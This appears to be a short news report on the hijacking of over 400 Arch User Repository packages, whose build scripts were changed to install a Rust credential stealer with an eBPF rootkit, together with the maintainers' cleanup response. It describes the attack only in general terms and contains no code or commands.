400+ Arch Linux AUR Packages Hijacked to Install Rust Credential Stealer

Attackers compromised over 400 packages in the Arch User Repository (AUR) this week, modifying their build scripts to distribute a Rust-based credential stealer. This malware targets developer secrets and, upon gaining root privileges, can deploy an eBPF rootkit for stealth. The AUR, a community-driven package repository for Arch Linux, operates independently from the official Arch Linux repositories. The compromise was discovered on March 12, 2024, by security researchers who observed malicious code within the build scripts of numerous popular AUR packages. The attackers reportedly used compromised accounts to push these malicious updates. The stolen credentials could include API keys, SSH private keys, and other sensitive information stored by developers. The eBPF rootkit functionality allows the malware to evade detection by standard security tools by manipulating kernel-level network and process information. Arch Linux maintainers have since begun the process of identifying and removing the compromised packages and are urging users to review their installed AUR packages for any signs of compromise. This incident highlights the security risks associated with community-maintained software repositories and the importance of rigorous vetting processes for user-submitted packages.